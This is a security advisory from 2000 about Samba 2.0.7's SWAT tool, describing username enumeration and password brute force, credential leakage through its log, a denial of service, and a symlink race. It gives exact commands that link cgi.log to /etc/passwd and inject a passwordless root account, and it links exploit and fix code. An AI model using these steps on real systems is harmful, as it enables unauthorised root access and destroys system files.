[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Samba 2.0.7 SWAT vulnerabilites

Title: Samba 2.0.7 SWAT vulnerabilites
Released by: Uberhax0r Communications
Date: 30th October 2000
Printable version: Click here
******************************************************************************

the original writeup can be found at http://www.uberhax0r.net/~miah/swat

along with all the code mentioned in this advisory

******************************************************************************



The program swat included in the samba distribution allows username and

password bruteforcing. An attacker can easily generate userlists and then

bruteforce their passwords. Comments in the source code show that somebody

tried to prevent this from happening[1].



The problem occurs when a user types in the wrong password. If swat gets a

valid username, but incorrect password it errors with:



2second pause



401 Authorization Required



You must be authenticated to use this service.



If swat gets a invalid username / password:



NO PAUSE



401 Bad Authorization



username/password must be supplied



The following code is written by t12. It will generate a list of valid

usernames and then brute force passwords for those usernames. It has been

tested on freebsd.



http://www.uberhax0r.net/~miah/swat/code/flyswatter.c



Obviously, if the username/password are correct you get logged in.



What makes this even worse is that swat does no logging. However; if

logging[2] is enabled a temp race exists. Swat does not check for file

existence before hand and it overwrites the file without regret. What

makes this even worse is swat will log *any* input it gets into this log

file. So for example we have local shell on a system running swat but want

root we simply:



ln -s /tmp/cgi.log /etc/passwd



telnet localhost 901

--enter the following--

rootuser::0:0::/:/bin/bash

--hang up the connection--



We now have the following entry in our /etc/passwd file:

[Date: Mon, 23 Oct 2000 16:03:13 GMT localhost.localdomain (127.0.0.1)]

rootuser::0:0::/:/bin/bash



You could also use this shell script

http://www.uberhax0r.net/~miah/swat/code/swat-exp.sh

or if you want it in C

http://www.uberhax0r.net/~miah/swat/code/swat-exp.c

also precompiled for linux

http://www.uberhax0r.net/~miah/swat/code/swat-exp.linux (code by optyx)



You can also download a fixed cgi.c

http://www.uberhax0r.net/~miah/swat/code/cgi.c.fixed (make your own damned

diff) (fix by optyx)



You can now su to that user. *NOTE* this will destroy the passwd file. Now

you might be thinking "but if the /tmp/cgi.log exists, how can a user

overwrite it with a symlink?". The answer: Why bother! The cgi.log file

contains everything the users webbrowser sent back to it including their

login/password.



The Authorization: Basic entries have username:password encoded in base64

in them. Most of the time the swat administrator will login as root to do

the changes to the smb.conf, so getting root is easy. You can run the

gimme-login.sh script to get a list of logins from the cgi.log.



Swat is also vulnerable to a DoS attack. Anybody can perform this. Simply

login to swat with a improper username and password, but change the

default url from "hostname:901" to somthing like

"hostname:901?somerandomfile". Swat will error with "Authentication

Required"(even with valid accounts) and inetd will restart it. Using

netscape, netscape will retry to get the file and will eventually cause

the inetd daemon to shutdown swat for 10 minutes (dependent on

inetd configuration, this is tested on linux redhat 6.2)



[1] In the cgi.c file the following entry exists:

Line 349/367

/*

* Always give the same error so a cracker

* cannot tell why we fail.

*/



The person that wrote this code obviously didn't check their work to well.



[2] Logging is enabled by changing samba-2.0.7/source/web/cgi.c's "#define

CGI_LOGGING 0" to "#define CGI_LOGGING 1". Some systems may have this

by default, otherwise its a tweak the sysadmin will most likely have to

do.



credit to miah for discovering everything and t12 and optyx for the

code.



*****************************************************************************

Uberhax0r Communications, putting bullets in mullets since '96








(C) 1999-2000 All rights reserved.